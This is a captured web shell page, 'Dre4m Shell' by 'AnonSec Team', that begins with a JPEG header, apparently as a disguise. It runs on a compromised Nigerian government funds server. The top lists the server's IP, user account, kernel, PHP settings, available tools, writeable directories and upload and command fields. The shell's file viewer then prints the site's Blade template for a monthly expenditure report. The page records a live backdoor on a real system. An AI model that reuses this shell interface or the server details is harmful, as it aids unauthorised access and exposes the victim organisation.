ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.148.144.137
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/storage/framework/views/b97cbeffda836c1710b01bd62f5840bad495a928.php
<?php $__env->startSection('pageTitle'); ?>
 
<?php $__env->stopSection(); ?>

<?php $__env->startSection('content'); ?>
<div class="box box-default" style= "border:none;">

        <div class="box-body">
        
       <?php echo $__env->make('layouts.allReportHeader', ['companyName'=>'defaultName', 'companyAddress'=>'defaultAddress', 'title1'=>'Monthly Expenditure Report', 'title2'=>'', 'showOnlyTitle1'=>1, 'showOnlyTitle2'=>0, 'hideLogos'=>0, 'hideAddress'=>0], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>   
        
           

        <div class="box-header with-border hidden-print">
          <h3 class="box-title"><?php echo $__env->yieldContent('pageTitle'); ?> <span id='processing'></span></h3>
        </div>
        <?php if($warning<>''): ?>
	<div class="alert alert-dismissible alert-danger">
	<button type="button" class="close" data-dismiss="alert">&times;</button>
	<strong><?php echo e($warning); ?></strong> 
	</div>
	<?php endif; ?>
	<?php if($success<>''): ?>
	<div class="alert alert-dismissible alert-success">
	<button type="button" class="close" data-dismiss="alert">&times;</button>
	<strong><?php echo e($success); ?></strong> 
	</div>
	<?php endif; ?>
	<?php if(count($errors) > 0): ?>
                    <div class="alert alert-danger alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Error!</strong> 
                        <?php $__currentLoopData = $errors->all(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $error): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <p><?php echo e($error); ?></p>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    </div>
                <?php endif; ?>
	<form method="post"  id="thisform1" name="thisform1" >
		<?php echo e(csrf_field()); ?>

		<div class="box-body">
			 <div class="row hidden-print">
	            		<div class="col-md-2">
	            		<label>Period</label>
				<select name="period" id="period" class="form-control" onchange ="ReloadForm();" >
		                <option value="" selected>-Select Year-</option>
		                	<?php $__currentLoopData = $YearPeriod; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
						<option value="<?php echo e($b->Period); ?>" <?php echo e(($period) == $b->Period? "selected":""); ?>><?php echo e($b->Period); ?></option>
		                	<?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> 
		                </select>
	            		</div>
	            		<div class="col-md-2">          
		                <label class="control-label">Month</label>
		                <select class="form-control" id="month" name="month" onchange="ReloadForm()" required="">
		                   <option value=""  > Choose One</option> 
		                   <option value="january" <?php echo e(($month) == 'january' ? "selected":""); ?>  > January</option>     
		                   <option value="february" <?php echo e(($month) == 'february' ? "selected":""); ?> > February</option> 
		                   <option value="march" <?php echo e(($month) == 'march' ? "selected":""); ?> > March</option> 
		                   <option value="april" <?php echo e(($month) == 'april' ? "selected":""); ?> > April</option> 
		                   <option value="may" <?php echo e(($month) == 'may' ? "selected":""); ?> > May</option> 
		                   <option value="june" <?php echo e(($month) == 'june' ? "selected":""); ?> > June</option> 
		                   <option value="july" <?php echo e(($month) == 'july' ? "selected":""); ?> > July</option> 
		                   <option value="august" <?php echo e(($month) == 'august' ? "selected":""); ?> > August</option> 
		                   <option value="september" <?php echo e(($month) == 'september' ? "selected":""); ?> > September</option> 
		                   <option value="october" <?php echo e(($month) == 'october' ? "selected":""); ?> > October</option> 
		                   <option value="november" <?php echo e(($month) == 'november' ? "selected":""); ?> > November</option> 
		                   <option value="december" <?php echo e(($month) == 'december' ? "selected":""); ?> > December</option> 
		                </select>
		            </div>
	            		<div class="col-md-2">
	            		<label>Allocation Source</label>
				<select name="allocationsource" id="allocationsource" class="form-control" onchange ="ReloadForm();">
		                <option value="" selected>-All-</option>
		                	<?php $__currentLoopData = $AllocationSource; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
						<option value="<?php echo e($b->ID); ?>" <?php echo e(($allocationsource) == $b->ID? "selected":""); ?>><?php echo e($b->allocation); ?></option>
		                	<?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> 
		                </select>
	            		</div>
	            		<div class="col-md-2">
	            		<label>Budget Type</label>
				<select name="budgettype" id="budgettype" class="form-control" onchange ="ReloadForm();">
		                <option value="" selected>-All-</option>
		                	<?php $__currentLoopData = $BudgetType; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
						<option value="<?php echo e($b->ID); ?>" <?php echo e(($budgettype) == $b->ID? "selected":""); ?>><?php echo e($b->contractType); ?></option>
		                	<?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> 
		                </select>
	            		</div>
	            		<div class="col-md-2">
	            		<label>Economic Head</label>
				<select name="economichead" id="economichead" class="form-control" onchange ="ReloadForm();">
		                <option value="" selected>-All-</option>
		                	<?php $__currentLoopData = $EconomicHead; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
						<option value="<?php echo e($b->ID); ?>" <?php echo e(($economichead) == $b->ID? "selected":""); ?>><?php echo e($b->economicHead); ?></option>
		                	<?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> 
		                </select>
	            		</div> 
	            		<div class="col-md-4">
	            		<label>Economic Codes</label>
				<select name="economiccode" id="economiccode" class="form-control" onchange ="ReloadForm();">
		                <option value="" selected>-All-</option>
		                	<?php $__currentLoopData = $EconomicCode; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
						<option value="<?php echo e($b->ID); ?>" <?php echo e(($economiccode) == $b->ID? "selected":""); ?>><?php echo e($b->economicCode); ?>|<?php echo e($b->description); ?></option>
		                	<?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> 
		                </select>
	            		</div>            		
	            	</div>
	            	 
			
	            		<div class="row">
	            		</div>
		<input id ="delcode" type="hidden"  name="delcode" >
		
		<div class="table-responsive" style="font-size: 12px; padding:10px;">
			<table class="table table-bordered">
			<thead>
				<tr >
			                <!--<th width="1%">S/N</th>	-->
			               	<th ></th>
			                <th >Eco/CD</th>	
			                <th ></th>	             
			                <th >Nass APPRCP <?php echo e($period); ?> <br>Approved Budget </th>
			                <th >Nass Appropriation <br> During the Month <?php echo e($month); ?> <?php echo e($period); ?></th>
			                <th >Actual Spending <br> This Month <?php echo e($month); ?> <?php echo e($period); ?></th>
			                <th >Outstanding <br/> Balance</th>
			                <th >Total Expenditure <br/> January- <?php echo e($month); ?> <?php echo e($period); ?></th>		                
			                <th >Remarks</th>
			                
		          
				
			 	</tr>
			</thead>
						<?php $serialNum = 1; ?>
						<?php $grouphead = ""; ?>
						<?php $__currentLoopData = $QueryVoultReport; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
							<?php if($b->economicHeadID!=$grouphead): ?>
							<tr>
								<?php $grouphead = $b->economicHeadID; ?>
								<!--<td></td>-->
								<td><?php echo e($b->economicheadcode); ?></td><td></td>
								<td colspan=7><b><?php echo e($b->economichead); ?>  (<?php echo e($b->economicgroup); ?>-<?php echo e($b->allocationsource); ?>)</b></td>
							</tr>
							<?php endif; ?>
							 
							<tr>
								<!--<td><?php echo e($serialNum ++); ?> </td>-->
								<td></td>
								<td><?php echo e($b->economiccode); ?></td>
								
								<td><?php echo e($b->economicdisc); ?></td>
								<td class="align"><?php echo e(number_format($b->allocationValue,2)); ?></td>
								<td class="align"><?php echo e(number_format(($b->allocationValue/12),2)); ?></td>
								<td class="align"><?php echo e(number_format($b->bookonhold+$b->expend,2)); ?></td>
								<td class="align"><?php echo e(number_format(($b->allocationValue/12)-($b->bookonhold + $b->expend), 2)); ?></td>
								<td class="align"><?php echo e(number_format($b->bookonholdtodate+$b->expendtodate,2)); ?></td>
								<td class="align">
								<?php if(($b->January-($b->bookonhold + $b->expend))<0): ?>
								Excess expenditure drawn from accumulated BF
								<?php endif; ?>
								</td>
								
							</tr>
							
						
			
						<?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>		
			 </table>
			 <button class="print hidden-print" type="submit" >Print</button>
		</div>
		</div>
		
	</form>
	
</div>
<?php $__env->stopSection(); ?>

<?php $__env->startSection('styles'); ?>
<link rel="stylesheet" type="text/css" href="<?php echo e(asset('assets/css/datepicker.min.css')); ?>">
<?php $__env->stopSection(); ?>

<?php $__env->startSection('scripts'); ?>
<link rel="stylesheet" type="text/css" href="<?php echo e(asset('assets/css/datepicker.min.css')); ?>">
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.19/css/jquery.dataTables.min.css">
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/buttons/1.5.2/css/buttons.dataTables.min.css">

<style>

.table tr th
{
text-transform:uppercase;
font-size: 14px;
}
.table tr td
{
font-size: 14px;
}
  @media  print{
.hidden-print{display:none!important}
 .dt-buttons, .dataTables_info, .dataTables_paginate, .dataTables_filter
{
display:none!important
}
}

  .align
{ 
 text-align:right;
}

</style>

<script src="<?php echo e(asset('assets/js/jquery-ui.min.js')); ?>"></script>

<script src="https://cdn.datatables.net/1.10.19/js/jquery.dataTables.min.js"></script>
<script src="https://cdn.datatables.net/buttons/1.5.2/js/dataTables.buttons.min.js"></script>
<script src="https://cdn.datatables.net/buttons/1.5.2/js/buttons.print.min.js"></script>

<script>
$('.print').click(function()
{
window.print();
});
</script>

<script type="text/javascript">
	$(document).ready(function(){
		 $('#fields').multiselect({
		  nonSelectedText: 'Select fields to view',
		  enableFiltering: true,
		  enableCaseInsensitiveFiltering: true,
		  buttonWidth:'400px',
		  includeSelectAllOption: true,
		 });
	});
</script>
  <script type="text/javascript">
  	function checkForm(){
  		var fields = document.getElementById('fields').value;
  		var form = document.getElementById('thisform1');
  		if(fields == ''){
  			alert('Please select fields to view'); 
  			return false;
  		} else{
  			form.submit();
  		}
  		return false;
  	}
  	
	function  ReloadForm()
	{
	//alert("ururu")	;	
	document.getElementById('thisform1').submit();
	return;
	}
	function  DeletePromo(id)
	{
		var cmt = confirm('You are about to delete a record. Click OK to continue?');
              if (cmt == true) {
					document.getElementById('delcode').value=id;
					document.getElementById('thisform1').submit();
					return;
 
              }
	
	}
  $( function() {
    $( "#todate" ).datepicker({changeMonth: true,changeYear: true,dateFormat: 'yy-mm-dd'});
    $( "#fromdate" ).datepicker({changeMonth: true,changeYear: true,dateFormat: 'yy-mm-dd'});
    $( "#appointmentDate" ).datepicker({changeMonth: true,changeYear: true,dateFormat: 'yy-mm-dd'});
    $( "#incrementalDate" ).datepicker({changeMonth: true,changeYear: true,dateFormat: 'yy-mm-dd'});
    $( "#firstArrivalDate" ).datepicker({changeMonth: true,changeYear: true,dateFormat: 'yy-mm-dd'});
  } );
  </script>
  <script>
  $(document).ready(function() {
      $('#mytable').DataTable( {
          dom: 'mytable',
          buttons: [
              {
                  extend: 'print',
                  customize: function ( win ) {
                      $(win.document.body)
                          .css( 'font-size', '10pt' )
                          .prepend(
                              ''
                          );
   
                      $(win.document.body).find( 'table' )
                          .addClass( 'compact' )
                          .css( 'font-size', 'inherit' );
                  }
              }
          ]
      } );
  } );
</script>
<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/resources/views/Report/VoultBalancemonthly.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team